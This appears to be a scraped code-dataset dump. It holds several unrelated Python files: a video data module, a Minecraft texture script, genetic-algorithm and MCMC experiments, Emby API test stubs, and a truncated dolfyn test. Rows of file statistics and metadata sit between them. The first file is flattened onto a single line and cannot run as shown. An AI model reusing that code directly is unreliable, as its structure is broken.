# # Copyright (C) 2020 Intel Corporation # # SPDX-License-Identifier: BSD-3-Clause # import logging from collections import Counter import torch from torch.utils.data import DataLoader from torchvision.transforms import transforms as T from torchvision.transforms import functional as TF import pytorch_lightning as pl from sklearn.model_selection import StratifiedShuffleSplit from oscar.data.ucf101 import UCF101Dataset from oscar.data.video import ClipSampler, MiddleClipSampler from oscar.data.transforms import ExCompose, Permute, Squeeze, Unsqueeze, ExSplitLambda from MARS.dataset.preprocess_data import get_mean logger = logging.getLogger(__name__) class MARSDataModule(pl.LightningDataModule): def __init__( self, modality, frames_root, annotation_dir, fold=1, batch_size=16, num_workers=1, frame_size=112, clip_length=16, clip_step=1, mid_clip_only=False, random_resized_crop_scale=(0.5, 1.0), test_indices=None, test_size=0, random_seed=0, collate_fn=None, frame_cache_dir=None, train_file_patterns=["{:05d}.jpg", "TVL1jpg_x_{:05d}.jpg", "TVL1jpg_y_{:05d}.jpg"], test_file_patterns=["{:05d}.jpg"], ): super().__init__() assert modality in ['RGB', 'RGB_Flow', 'RGBMasked_Flow', 'RGBMasked_FlowMasked', 'RGBSeg_Flow', 'RGBSegMC_Flow', 'RGBSegSC_Flow', 'RGBKeySC_Flow'] self.modality = modality self.frames_root = frames_root self.annotation_dir = annotation_dir self.fold = fold self.batch_size = batch_size self.num_workers = num_workers self.frame_size = frame_size self.clip_length = clip_length self.clip_step = clip_step self.mid_clip_only = mid_clip_only self.random_resized_crop_scale = random_resized_crop_scale self.test_indices = test_indices self.test_size = test_size self.random_seed = random_seed self.collate_fn = collate_fn self.frame_cache_dir = frame_cache_dir self.train_file_patterns = train_file_patterns self.test_file_patterns = test_file_patterns from detectron2.data import MetadataCatalog self.palette = MetadataCatalog.get('coco_2017_val').thing_colors if 
'RGBSegMC_' in self.modality: self.input_channels = len(self.palette) + 2 # COCO-things + XY elif 'RGBSegSC_' in self.modality or 'RGBKeySC_' in self.modality: self.input_channels = 1 + 2 # Mask + XY else: self.input_channels = 3 + 2 # RGB + XY @classmethod def add_argparse_args(cls, parser): group = parser.add_argument_group(cls.__name__) group.add_argument('--modality', default='RGB', type=str, choices=['RGB', 'RGB_Flow', 'RGBMasked_Flow', 'RGBMasked_FlowMasked', 'RGBSeg_Flow', 'RGBSegMC_Flow', 'RGBSegSC_Flow', 'RGBKeySC_Flow']) group.add_argument('--dataset', default='UCF101', type=str, choices=['UCF101']) group.add_argument('--only_RGB', default=False, action='store_true') group.add_argument('--batch_size', default=32, type=int) group.add_argument('--frame_dir', default=None, type=str) group.add_argument('--annotation_path', default=None, type=str) group.add_argument('--frame_mask_dir', default=None, type=str) group.add_argument('--n_workers', default=4, type=int) group.add_argument('--split', default=1, type=int, choices=[1, 2, 3]) group.add_argument('--sample_size', default=112, type=int) group.add_argument('--sample_duration', default=16, type=int) group.add_argument('--step_between_clips', default=1, type=int) group.add_argument('--random_resized_crop_scale_min', default=0.5, type=float) group.add_argument('--random_resized_crop_scale_max', default=1.0, type=float) group.add_argument('--test_size', default=0, type=int) group.add_argument('--test_index', default=None, type=int, nargs='+') group.add_argument('--random_seed', default=1, type=bool, help='Manually set random seed of sampling validation clip') group.add_argument('--mid_clip_only', default=False, type=bool) group.add_argument('--shuffle_axes', default=None, type=int, nargs='+') return parser def prepare_data(self): UCF101Dataset(self.frames_root, self.annotation_dir, self.train_file_patterns, fold=self.fold) def setup(self, stage=None): logger.info("Setting up data module for stage: %s", stage) 
channels_mean = torch.tensor([*get_mean('activitynet'), 127.5, 127.5]) train_channels_mean = channels_mean test_channels_mean = channels_mean[0:3] # Create robust feature transform robust_extractor = None if 'RGBMasked_' in self.modality: from oscar.defences.preprocessor.detectron2 import CachedDetectron2Preprocessor from oscar.defences.preprocessor.ablator import AblatorPyTorch dt2 = CachedDetectron2Preprocessor(self.frame_cache_dir) robust_extractor = AblatorPyTorch(channels_mean / 255, detectron2=dt2) elif 'RGBSeg_' in self.modality: from oscar.defences.preprocessor.detectron2 import CachedDetectron2Preprocessor from oscar.defences.preprocessor.paletted_semantic_segmentor import PalettedSemanticSegmentorPyTorch dt2 = CachedDetectron2Preprocessor(self.frame_cache_dir) robust_extractor = PalettedSemanticSegmentorPyTorch(channels_mean[0:3] / 255, detectron2=dt2, palette=self.palette) elif 'RGBSegMC_' in self.modality: from oscar.defences.preprocessor.detectron2 import CachedDetectron2Preprocessor from oscar.defences.preprocessor.multichannel_semantic_segmentor import MultichannelSemanticSegmentorPyTorch dt2 = CachedDetectron2Preprocessor(self.frame_cache_dir) robust_extractor = MultichannelSemanticSegmentorPyTorch(detectron2=dt2, nb_channels=len(self.palette)) train_channels_mean = 127.5 test_channels_mean = 127.5 elif 'RGBSegSC_' in self.modality or 'RGBKeySC_' in self.modality: # TODO: Create another segmentor class that is faster and selects objects relevant to UCF101 from oscar.defences.preprocessor.detectron2 import CachedDetectron2Preprocessor from oscar.defences.preprocessor.multichannel_semantic_segmentor import MultichannelSemanticSegmentorPyTorch dt2 = CachedDetectron2Preprocessor(self.frame_cache_dir) robust_extractor = MultichannelSemanticSegmentorPyTorch(detectron2=dt2, nb_channels=1) # 1 channel == person mask train_channels_mean = 127.5 test_channels_mean = 127.5 # Apply robust feature extractor to RGB channels only if not _FlowMasked if 
robust_extractor is not None and '_FlowMasked' not in self.modality: robust_extractor = ExSplitLambda(robust_extractor, 3, 0, dim=-1) robust_transform = ExCompose([ T.Normalize(0, 255), # [0, 255] -> [0, 1] Permute(0, 2, 3, 1), # TCHW -> THWC Unsqueeze(0), # THWC -> NTHWC robust_extractor, # Apply robust feature extractor Squeeze(0), # NTHWC -> THWC Permute(0, 3, 1, 2), # THWC -> TCHW T.Normalize(0, 1/255), # [0, 1] -> [0, 255] ]) # Train transform # FIXME: Don't load flow when modality does not specify _Flow! # FIXME: Is there a way to decouple rgb and flow datasets like we did above? # The problem is they need to be synchronized somehow. train_transform = ExCompose([ robust_transform, T.RandomResizedCrop(self.frame_size, scale=self.random_resized_crop_scale, ratio=(1., 1.)), # Crop then Resize T.RandomApply([TF.hflip, ExSplitLambda(T.Normalize(255, -1), 1, -2, dim=-1)]), # Horizontal flip and invert x-flow randomly T.Normalize(train_channels_mean, 1), # [0, 255] -> ~[-128, 128] Permute(1, 0, 2, 3), # TCHW -> CTHW ]) train_sampler = ClipSampler(self.clip_length, self.clip_step) # Test transform test_transform = ExCompose([ robust_transform, T.Resize(self.frame_size), T.CenterCrop(self.frame_size), T.Normalize(test_channels_mean, 1), # [0, 255] -> ~[-128, 128] Permute(1, 0, 2, 3), # TCHW -> CTHW ]) test_sampler = range if self.mid_clip_only: test_sampler = MiddleClipSampler(self.clip_length, self.clip_step) if stage == 'fit' or stage is None: logger.info("Loading training data...") self.train_dataset = UCF101Dataset(self.frames_root, self.annotation_dir, self.train_file_patterns, train=True, fold=self.fold, transform=train_transform, sampler=train_sampler) logger.info("train data = %d", len(self.train_dataset)) logger.info("Loading validation data...") self.val_dataset = UCF101Dataset(self.frames_root, self.annotation_dir, self.test_file_patterns, train=False, fold=self.fold, transform=test_transform, sampler=train_sampler) logger.info("val data = %d", 
len(self.val_dataset)) if stage == 'test' or stage is None: logger.info("Loading test data...") test_dataset = UCF101Dataset(self.frames_root, self.annotation_dir, self.test_file_patterns, train=False, fold=self.fold, transform=test_transform, sampler=test_sampler) # Select test indices... if self.test_indices is not None: logger.info("Selecting data indices: %s", self.test_indices) test_dataset = torch.utils.data.Subset(test_dataset, self.test_indices) # ...or subsample test_dataset using a stratified split of test_size elements. elif self.test_size > 0: y = test_dataset.targets if test_dataset.target_transform is not None: y_transform = [test_dataset.target_transform(y_) for y_ in y] sss = StratifiedShuffleSplit(n_splits=1, test_size=self.test_size, random_state=self.random_seed) _, indices = next(sss.split(y, y_transform)) y_selected = [y[i] for i in indices] logger.info("Stratified subsampling test dataset to %d samples: %s", self.test_size, Counter(y_selected)) test_dataset = torch.utils.data.Subset(test_dataset, indices) self.test_dataset = test_dataset logger.info("test data = %d", len(self.test_dataset)) def train_dataloader(self): return DataLoader(self.train_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, pin_memory=True, drop_last=True, collate_fn=self.collate_fn) def val_dataloader(self): return DataLoader(self.val_dataset, batch_size=self.batch_size, shuffle=False, num_workers=self.num_workers, pin_memory=True, drop_last=True, collate_fn=self.collate_fn) def test_dataloader(self): return DataLoader(self.test_dataset, batch_size=1, # Must be 1 because we can't batch whole videos shuffle=False, num_workers=self.num_workers, pin_memory=True, drop_last=False, collate_fn=self.collate_fn)
45.508834
202
0.601444
1,412
12,879
5.255666
0.20255
0.029646
0.040965
0.031263
0.415577
0.348875
0.322733
0.291066
0.252796
0.251853
0
0.025222
0.310428
12,879
282
203
45.670213
0.810382
0.074618
0
0.25
0
0
0.079855
0.005217
0
0
0
0.003546
0.004545
1
0.031818
false
0
0.095455
0.013636
0.15
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bd9dc0e3438ed94163bddc922821b2e616468b1a
2,704
py
Python
bin/changes.py
kcrca/clarity
84acb9b17bd8b84222bf25e3bb32fc578832e37f
[ "CC-BY-4.0" ]
1
2016-08-25T02:17:47.000Z
2016-08-25T02:17:47.000Z
bin/changes.py
kcrca/clarity
84acb9b17bd8b84222bf25e3bb32fc578832e37f
[ "CC-BY-4.0" ]
null
null
null
bin/changes.py
kcrca/clarity
84acb9b17bd8b84222bf25e3bb32fc578832e37f
[ "CC-BY-4.0" ]
2
2016-08-01T05:02:30.000Z
2022-01-14T12:58:14.000Z
#!/usr/bin/env python3 # Generate the animations and images needed to provide the "changes" texture pack. __author__ = 'arnold' import os import random import json import collections from PIL import Image import clip weeks_in_year = 52 timings = collections.OrderedDict() timings['autumn'] = 2 timings['winter'] = 8 timings['spring'] = 2 day = 24000 debug_timing = False if debug_timing: weeks_in_year = 8 timings['winter'] = 2 day = 2 week = day * 7 transition = week / 2 timings['summer'] = weeks_in_year - sum(timings[x] for x in timings) year = weeks_in_year * week if debug_timing: transition = 70 frames = [] animation = {'frametime': transition} wrapper = {'animation': animation} index = 0 for season in timings: duration = timings[season] stay_time = duration * week - transition if debug_timing: stay_time = week frame_json = {'index': index, 'time': stay_time} frames.append(frame_json) frames.append(index) index += 1 # Set the seed to prevent the mcmeta changing each time this is run. Otherwise we end up checking a new file each time # we run the script. 
random.seed(13) os.chdir(clip.directory('top', 'changes.repack', 'override', 'assets', 'minecraft', 'textures', 'block')) transparent = (0, 0, 0, 0) for tree in ('oak', 'birch', 'jungle', 'big_oak', 'acacia'): leaves_img = None branches_img = None h = 0 index = 0 adjust_start = random.randrange(0, day) adjust_end = day - adjust_start adjusted_frames = frames[:] if adjust_start: adjusted_frames.insert(0, {'index': 0, 'time': adjust_start}) if adjust_end: adjusted_frames.insert(len(adjusted_frames) - 1, {'index': len(timings) - 1, 'time': adjust_end}) animation['frames'] = adjusted_frames for season in timings: season_img = Image.open('%s/leaves_%s.png' % (season, tree)) if not leaves_img: w, h = season_img.size leaves_img = Image.new(season_img.mode, (w, 4 * h), transparent) branches_img = Image.new(season_img.mode, (w, 4 * h), transparent) frame_pos = h * index if season == 'winter': branches_img.paste(season_img, (0, frame_pos)) else: leaves_img.paste(season_img, (0, frame_pos)) index += 1 animation['interpolate'] = True with open('leaves_%s.png.mcmeta' % tree, 'w') as f: json.dump(wrapper, f, indent=2) animation['interpolate'] = False with open('branches_%s.png.mcmeta' % tree, 'w') as f: json.dump(wrapper, f, indent=2) leaves_img.save('leaves_%s.png' % tree, optimize=True) branches_img.save('branches_%s.png' % tree, optimize=True)
29.075269
118
0.651257
376
2,704
4.531915
0.345745
0.03169
0.025822
0.021127
0.146714
0.123239
0.123239
0.092723
0.092723
0.092723
0
0.018993
0.221154
2,704
92
119
29.391304
0.790123
0.088018
0
0.150685
1
0
0.114947
0.008936
0
0
0
0
0
1
0
false
0
0.082192
0
0.082192
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
bd9ea740497b5430ed79706f049d86c226916d0f
8,929
py
Python
exp2.py
jdrugo/LCSBookCode
ce9b8f35919e7dd959d007e6543d1479bbe2a26a
[ "MIT" ]
1
2020-11-25T14:57:49.000Z
2020-11-25T14:57:49.000Z
exp2.py
jdrugo/LCSBookCode
ce9b8f35919e7dd959d007e6543d1479bbe2a26a
[ "MIT" ]
null
null
null
exp2.py
jdrugo/LCSBookCode
ce9b8f35919e7dd959d007e6543d1479bbe2a26a
[ "MIT" ]
null
null
null
"""Trains a Bayesian LCS with a GA on the Waterhouse (1996) test function. """ import sys from numpy import double, array, ones, empty, arange, empty, hstack, \ sqrt, exp, sort, sum, inf, power, dot, linspace, sin, pi from numpy.random import random, randn, binomial, uniform, normal import Gnuplot from ga import GeneticAlgorithm_TS from cls import RBF1DClStore, RBF1DIndv, \ SoftIntervalClStore, SoftInterval1DIndv from mcmc import SampleModelPosterior from experiments import read_data, write_data, write_raw_data, plot_cls, \ GA_experiment, MCMC_experiment waterhouse_data_file = "exp2_waterhouse.data" waterhouse_data_raw_file = "exp2_waterhouse_raw.data" waterhouse_data_points = 200 own_data_file = "exp2_own.data" own_data_raw_file = "exp2_own_raw.data" own_data_points = 300 noise_data_file = "exp2_noise.data" noise_data_raw_file = "exp2_noise_raw.data" noise_data_points = 200 sinus_data_file = "exp2_sinus.data" sinus_data_raw_file = "exp2_sinus_raw.data" sinus_data_points = 300 def write_waterhouse_data(): """Generates the data set and writes it to the data_file. """ # generate the data x, y #var = 0.44 var = 0.20 #var = 0.05 x = sort(random(waterhouse_data_points) * 4.0) y = 4.26 * (exp(-x) - 4 * exp(-2 * x) + 3 * exp(-3 * x)) \ + sqrt(var) * randn(waterhouse_data_points) # write the data write_data(x, y, waterhouse_data_file) def write_waterhouse_raw_data(): """Writes the raw data without noise. """ x = linspace(0, 4, 1000) y = 4.26 * (exp(-x) - 4 * exp(-2 * x) + 3 * exp(-3 * x)) write_data(x, y, waterhouse_data_raw_file) def read_waterhouse_data(): return read_data(waterhouse_data_file) def own_f(x): """Returns f(x) for given x. 
""" # functions are # f1(x) = 0.05 + 0.5 x # f2(x) = 2 - 4 x # f3(x) = -1.5 + 2.5 x fns = array([[0.05, 0.5], [2.0, -4.0], [-1.5, 2.5]], double) # gaussian basis functions are given by (mu, var, weight): # (0.2, 0.05), (0.5, 0.01), (0.8, 0.05) gbfs = array([[0.2, 0.05, 0.5], [0.5, 0.01, 1.0], [0.8, 0.05, 0.4]], double) # plain function values fx = fns[:,0] + x * fns[:,1] #print "%f\t%f\t%f\t%f" % (x, fx[0], fx[1], fx[2]) # mixing weights mx = gbfs[:,2] * exp(-0.5 / gbfs[:,1] * power(x - gbfs[:,0], 2.0)) mx /= sum(mx) #print "%f\t%f\t%f\t%f" % (x, mx[0], mx[1], mx[2]) # return mixed function return dot(fx, mx) def write_own_data(): """Generates 'artificial' dataset and writes it to file. """ noise = 0.1 x = uniform(size = own_data_points) y = array([own_f(x_n) for x_n in x], double) + \ normal(size = own_data_points) * noise write_data(x, y, own_data_file) def write_own_raw_data(): """Writes raw classifier and function to file. """ x = linspace(0, 1.0, 1000) y = array([own_f(x_n) for x_n in x], double) W = array([[0.05, 0.5], [2.0, -4.0], [-1.5, 2.5]], double) X = hstack((ones(len(x), double).reshape(len(x), 1), x.reshape(len(x), 1))) Y = dot(X, W.T) write_raw_data(x, hstack([y.reshape(len(x), 1), Y]), own_data_raw_file) def read_own_data(): return read_data(own_data_file) def noise_f(x): """function with different noise levels. """ if x > 0: return -1.0 + 2.0 * x else: return -1.0 - 2.0 * x def write_noise_data(): """Generates function with different leven of noise in different areas of the function. """ l_noise, u_noise = 0.6, 0.1 x = uniform(-1.0, 1.0, size = noise_data_points) y = array([noise_f(xn) + \ (normal(0.0, l_noise) if xn < 0 else normal(0.0, u_noise)) \ for xn in x], double) write_data(x, y, noise_data_file) def write_noise_raw_data(): """Writes the basic function. 
""" x = linspace(-1, 1, 1000) y = array([noise_f(x_n) for x_n in x], double) write_data(x, y, noise_data_raw_file) def read_noise_data(): return read_data(noise_data_file) def write_sinus_data(): """Generates sinusoid data with some noise. """ x = uniform(-1.0, 1.0, size = sinus_data_points) y = sin(2 * pi * x) + normal(0.0, 0.15, size = sinus_data_points) write_data(x, y, sinus_data_file) def write_sinus_raw_data(): """Generate sinusoid data without noise. """ x = linspace(-1.0, 1.0, 1000) y = sin(2 * pi * x) write_data(x, y, sinus_data_raw_file) def read_sinus_data(): return read_data(sinus_data_file) def exp2a(): """Running GA on waterhouse data. """ X, Y = read_waterhouse_data() N = X.shape[0] Xf = ones(N, double).reshape(N, 1) cl_store = RBF1DClStore(0.0, 4.0) # run experiment with over 100 epochs with 20 individuals in the pop. GA_experiment(X, Y, Xf, 250, [1 + binomial(4, 0.5) for p in xrange(20)], cl_store, RBF1DIndv, 'exp2a_fitness.data', 'exp2a_cls.data') def exp2b(): """Running MCMC on waterhouse data. """ X, Y = read_waterhouse_data() N = X.shape[0] Xf = ones(N, double).reshape(N, 1) cl_store = RBF1DClStore(0.0, 4.0) MCMC_experiment(X, Y, Xf, 500, 10, 0.25, 1 + binomial(4, 0.5), cl_store, 'exp2b_varbound.data', 'exp2b_cls.data') def exp2c(): """Running GA on own data. """ X, Y = read_own_data() N = X.shape[0] Xf = ones(N, double).reshape(N, 1) cl_store = RBF1DClStore(0.0, 1.0) # run experiment with over 100 epochs with 20 individuals in the pop. GA_experiment(X, Y, Xf, 250, [1 + binomial(8, 0.5) for p in xrange(20)], cl_store, RBF1DIndv, 'exp2c_fitness.data', 'exp2c_cls.data') def exp2d(): """Running MCMC on own data. """ X, Y = read_own_data() N = X.shape[0] Xf = ones(N, double).reshape(N, 1) cl_store = RBF1DClStore(0.0, 1.0) MCMC_experiment(X, Y, Xf, 500, 10, 0.25, 1 + binomial(8, 0.5), cl_store, 'exp2d_varbound.data', 'exp2d_cls.data') def exp2e(): """Running GA on noisy data, using soft interval classifiers. 
""" X, Y = read_noise_data() N = X.shape[0] Xf = ones(N, double).reshape(N, 1) cl_store = SoftIntervalClStore(-1.0, 1.0) # run experiment with over 100 epochs with 20 individuals in the pop. GA_experiment(X, Y, Xf, 250, [1 + binomial(8, 0.5) for p in xrange(20)], cl_store, SoftInterval1DIndv, 'exp2e_fitness.data', 'exp2e_cls.data') def exp2f(): """Running MCMC on noisy data, using soft interval classifiers. """ X, Y = read_noise_data() N = X.shape[0] Xf = ones(N, double).reshape(N, 1) cl_store = SoftIntervalClStore(-1.0, 1.0) MCMC_experiment(X, Y, Xf, 500, 10, 0.25, 1 + binomial(8, 0.5), cl_store, 'exp2f_varbound.data', 'exp2f_cls.data') def exp2g(): """Running GA on sinusoid data, using soft interval classifiers. """ X, Y = read_sinus_data() N = X.shape[0] Xf = ones(N, double).reshape(N, 1) cl_store = SoftIntervalClStore(-1.0, 1.0) # run experiment with over 100 epochs with 20 individuals in the pop. GA_experiment(X, Y, Xf, 250, [1 + binomial(8, 0.5) for p in xrange(20)], cl_store, SoftInterval1DIndv, 'exp2g_fitness.data', 'exp2g_cls.data') def exp2h(): """Running MCMC on sinusoid data, using soft interval classifiers. 
""" X, Y = read_sinus_data() N = X.shape[0] Xf = ones(N, double).reshape(N, 1) cl_store = SoftIntervalClStore(-1.0, 1.0) MCMC_experiment(X, Y, Xf, 500, 10, 0.25, 1 + binomial(8, 0.5), cl_store, 'exp2h_varbound.data', 'exp2h_cls.data') # run experiments from arguments if __name__ == '__main__': exp_modes = {'gen1': lambda: write_waterhouse_data(), 'gen2': lambda: write_own_data(), 'gen3': lambda: write_noise_data(), 'gen4': lambda: write_sinus_data(), 'raw1': lambda: write_waterhouse_raw_data(), 'raw2': lambda: write_own_raw_data(), 'raw3': lambda: write_noise_raw_data(), 'raw4': lambda: write_sinus_raw_data(), 'a': lambda: exp2a(), 'b': lambda: exp2b(), 'c': lambda: exp2c(), 'd': lambda: exp2d(), 'e': lambda: exp2e(), 'f': lambda: exp2f(), 'g': lambda: exp2g(), 'h': lambda: exp2h()} for argv in sys.argv[1:]: if not exp_modes.has_key(argv): print "--- Unkown experiment: %s" % argv else: print "--- Running '%s'" % argv exp_modes[argv]()
33.317164
80
0.579348
1,363
8,929
3.622157
0.142333
0.009723
0.014584
0.017825
0.416852
0.371278
0.348592
0.33887
0.33887
0.320235
0
0.063156
0.274723
8,929
267
81
33.441948
0.699197
0.077052
0
0.309392
0
0
0.068623
0.003354
0
0
0
0
0
0
null
null
0
0.044199
null
null
0.01105
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
bd9f9949e13417fd14f6292afebf26ca964e5be3
9,439
py
Python
test/test_live_tv_service_api.py
stanionascu/python-embyapi
a3f7aa49aea4052277cc43605c0d89bc6ff21913
[ "BSD-3-Clause" ]
null
null
null
test/test_live_tv_service_api.py
stanionascu/python-embyapi
a3f7aa49aea4052277cc43605c0d89bc6ff21913
[ "BSD-3-Clause" ]
null
null
null
test/test_live_tv_service_api.py
stanionascu/python-embyapi
a3f7aa49aea4052277cc43605c0d89bc6ff21913
[ "BSD-3-Clause" ]
null
null
null
# coding: utf-8 """ Emby Server API Explore the Emby Server API # noqa: E501 OpenAPI spec version: 4.1.1.0 Generated by: https://github.com/swagger-api/swagger-codegen.git """ from __future__ import absolute_import import unittest import embyapi from embyapi.api.live_tv_service_api import LiveTvServiceApi # noqa: E501 from embyapi.rest import ApiException class TestLiveTvServiceApi(unittest.TestCase): """LiveTvServiceApi unit test stubs""" def setUp(self): self.api = LiveTvServiceApi() # noqa: E501 def tearDown(self): pass def test_delete_livetv_channelmappingoptions(self): """Test case for delete_livetv_channelmappingoptions """ pass def test_delete_livetv_channelmappings(self): """Test case for delete_livetv_channelmappings """ pass def test_delete_livetv_listingproviders(self): """Test case for delete_livetv_listingproviders Deletes a listing provider # noqa: E501 """ pass def test_delete_livetv_recordings_by_id(self): """Test case for delete_livetv_recordings_by_id Deletes a live tv recording # noqa: E501 """ pass def test_delete_livetv_seriestimers_by_id(self): """Test case for delete_livetv_seriestimers_by_id Cancels a live tv series timer # noqa: E501 """ pass def test_delete_livetv_timers_by_id(self): """Test case for delete_livetv_timers_by_id Cancels a live tv timer # noqa: E501 """ pass def test_delete_livetv_tunerhosts(self): """Test case for delete_livetv_tunerhosts Deletes a tuner host # noqa: E501 """ pass def test_get_livetv_channelmappingoptions(self): """Test case for get_livetv_channelmappingoptions """ pass def test_get_livetv_channelmappings(self): """Test case for get_livetv_channelmappings """ pass def test_get_livetv_channels(self): """Test case for get_livetv_channels Gets available live tv channels. 
# noqa: E501 """ pass def test_get_livetv_channels_by_id(self): """Test case for get_livetv_channels_by_id Gets a live tv channel # noqa: E501 """ pass def test_get_livetv_guideinfo(self): """Test case for get_livetv_guideinfo Gets guide info # noqa: E501 """ pass def test_get_livetv_info(self): """Test case for get_livetv_info Gets available live tv services. # noqa: E501 """ pass def test_get_livetv_listingproviders(self): """Test case for get_livetv_listingproviders Gets current listing providers # noqa: E501 """ pass def test_get_livetv_listingproviders_available(self): """Test case for get_livetv_listingproviders_available Gets listing provider # noqa: E501 """ pass def test_get_livetv_listingproviders_default(self): """Test case for get_livetv_listingproviders_default """ pass def test_get_livetv_listingproviders_lineups(self): """Test case for get_livetv_listingproviders_lineups Gets available lineups # noqa: E501 """ pass def test_get_livetv_listingproviders_schedulesdirect_countries(self): """Test case for get_livetv_listingproviders_schedulesdirect_countries Gets available lineups # noqa: E501 """ pass def test_get_livetv_liverecordings_by_id_stream(self): """Test case for get_livetv_liverecordings_by_id_stream Gets a live tv channel # noqa: E501 """ pass def test_get_livetv_livestreamfiles_by_id_by_container(self): """Test case for get_livetv_livestreamfiles_by_id_by_container Gets a live tv channel # noqa: E501 """ pass def test_get_livetv_programs(self): """Test case for get_livetv_programs Gets available live tv epgs.. # noqa: E501 """ pass def test_get_livetv_programs_recommended(self): """Test case for get_livetv_programs_recommended Gets available live tv epgs.. 
# noqa: E501 """ pass def test_get_livetv_recordings(self): """Test case for get_livetv_recordings Gets live tv recordings # noqa: E501 """ pass def test_get_livetv_recordings_by_id(self): """Test case for get_livetv_recordings_by_id Gets a live tv recording # noqa: E501 """ pass def test_get_livetv_recordings_folders(self): """Test case for get_livetv_recordings_folders Gets recording folders # noqa: E501 """ pass def test_get_livetv_recordings_groups(self): """Test case for get_livetv_recordings_groups Gets live tv recording groups # noqa: E501 """ pass def test_get_livetv_recordings_groups_by_id(self): """Test case for get_livetv_recordings_groups_by_id Gets a recording group # noqa: E501 """ pass def test_get_livetv_recordings_series(self): """Test case for get_livetv_recordings_series Gets live tv recordings # noqa: E501 """ pass def test_get_livetv_seriestimers(self): """Test case for get_livetv_seriestimers Gets live tv series timers # noqa: E501 """ pass def test_get_livetv_seriestimers_by_id(self): """Test case for get_livetv_seriestimers_by_id Gets a live tv series timer # noqa: E501 """ pass def test_get_livetv_timers(self): """Test case for get_livetv_timers Gets live tv timers # noqa: E501 """ pass def test_get_livetv_timers_by_id(self): """Test case for get_livetv_timers_by_id Gets a live tv timer # noqa: E501 """ pass def test_get_livetv_timers_defaults(self): """Test case for get_livetv_timers_defaults Gets default values for a new timer # noqa: E501 """ pass def test_get_livetv_tunerhosts(self): """Test case for get_livetv_tunerhosts Gets tuner hosts # noqa: E501 """ pass def test_get_livetv_tunerhosts_types(self): """Test case for get_livetv_tunerhosts_types """ pass def test_get_livetv_tuners_discvover(self): """Test case for get_livetv_tuners_discvover """ pass def test_head_livetv_channelmappingoptions(self): """Test case for head_livetv_channelmappingoptions """ pass def test_head_livetv_channelmappings(self): """Test case for 
head_livetv_channelmappings """ pass def test_options_livetv_channelmappingoptions(self): """Test case for options_livetv_channelmappingoptions """ pass def test_options_livetv_channelmappings(self): """Test case for options_livetv_channelmappings """ pass def test_patch_livetv_channelmappingoptions(self): """Test case for patch_livetv_channelmappingoptions """ pass def test_patch_livetv_channelmappings(self): """Test case for patch_livetv_channelmappings """ pass def test_post_livetv_channelmappingoptions(self): """Test case for post_livetv_channelmappingoptions """ pass def test_post_livetv_channelmappings(self): """Test case for post_livetv_channelmappings """ pass def test_post_livetv_listingproviders(self): """Test case for post_livetv_listingproviders Adds a listing provider # noqa: E501 """ pass def test_post_livetv_programs(self): """Test case for post_livetv_programs Gets available live tv epgs.. # noqa: E501 """ pass def test_post_livetv_seriestimers(self): """Test case for post_livetv_seriestimers Creates a live tv series timer # noqa: E501 """ pass def test_post_livetv_seriestimers_by_id(self): """Test case for post_livetv_seriestimers_by_id Updates a live tv series timer # noqa: E501 """ pass def test_post_livetv_timers(self): """Test case for post_livetv_timers Creates a live tv timer # noqa: E501 """ pass def test_post_livetv_timers_by_id(self): """Test case for post_livetv_timers_by_id Updates a live tv timer # noqa: E501 """ pass def test_post_livetv_tunerhosts(self): """Test case for post_livetv_tunerhosts Adds a tuner host # noqa: E501 """ pass def test_post_livetv_tuners_by_id_reset(self): """Test case for post_livetv_tuners_by_id_reset Resets a tv tuner # noqa: E501 """ pass def test_put_livetv_channelmappingoptions(self): """Test case for put_livetv_channelmappingoptions """ pass def test_put_livetv_channelmappings(self): """Test case for put_livetv_channelmappings """ pass if __name__ == '__main__': unittest.main()
23.896203
78
0.637144
1,111
9,439
5.078308
0.10261
0.09252
0.105282
0.143566
0.830202
0.737859
0.521446
0.357497
0.193194
0.133286
0
0.01882
0.296324
9,439
394
79
23.956853
0.830623
0.447505
0
0.458333
1
0
0.001869
0
0
0
0
0
0
1
0.466667
false
0.458333
0.041667
0
0.516667
0
0
0
0
null
0
0
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
1
0
1
0
0
1
0
0
6
bda0ee2b60b3089f82bfd69b9afe911afcc77e80
4,454
py
Python
dolfyn/tests/test_vs_nortek.py
jklymak/dolfyn
eea98fe0021886cf654e25293c385c5c3707ff8d
[ "BSD-3-Clause" ]
null
null
null
dolfyn/tests/test_vs_nortek.py
jklymak/dolfyn
eea98fe0021886cf654e25293c385c5c3707ff8d
[ "BSD-3-Clause" ]
null
null
null
dolfyn/tests/test_vs_nortek.py
jklymak/dolfyn
eea98fe0021886cf654e25293c385c5c3707ff8d
[ "BSD-3-Clause" ]
null
null
null
from dolfyn.tests import test_read_adp as tr
from dolfyn.tests import base
from dolfyn.rotate.api import rotate2
from numpy.testing import assert_allclose
import numpy as np
import scipy.io as sio

"""
Testing against velocity and bottom-track velocity data in Nortek mat files
exported from SignatureDeployment.

inst2earth rotation fails for AHRS-equipped istruments and I don't know why -
I believe it's due to an RC filter (or some such) on Nortek's side after they
load in the orientation matrix from the AHRS (Check out the difference
colorplots compared to non-AHRS instruments.) Using HPR- or quaterion-calc'd
orientation matrices doesn't close the gap.
"""


def load_nortek_matfile(filename):
    """Load velocity data from a Nortek SignatureDeployment .mat export.

    Returns a dict keyed by coordinate system ('beam', 'inst', 'earth'),
    each holding a (4, ...) stacked velocity array; adds 'omat' (AHRS
    orientation matrix) and 'b5' (5th beam) when present in the file.
    When bottom-track fields exist, returns (vel, vel_bt) instead.
    """
    # remember to transpose this data
    data = sio.loadmat(filename, struct_as_record=False, squeeze_me=True)
    d = data['Data']
    # print(d._fieldnames)
    burst = 'Burst'
    bt = 'BottomTrack'
    beam = ['_VelBeam1', '_VelBeam2', '_VelBeam3', '_VelBeam4']
    b5 = 'IBurst_VelBeam5'
    inst = ['_VelX', '_VelY', '_VelZ1', '_VelZ2']
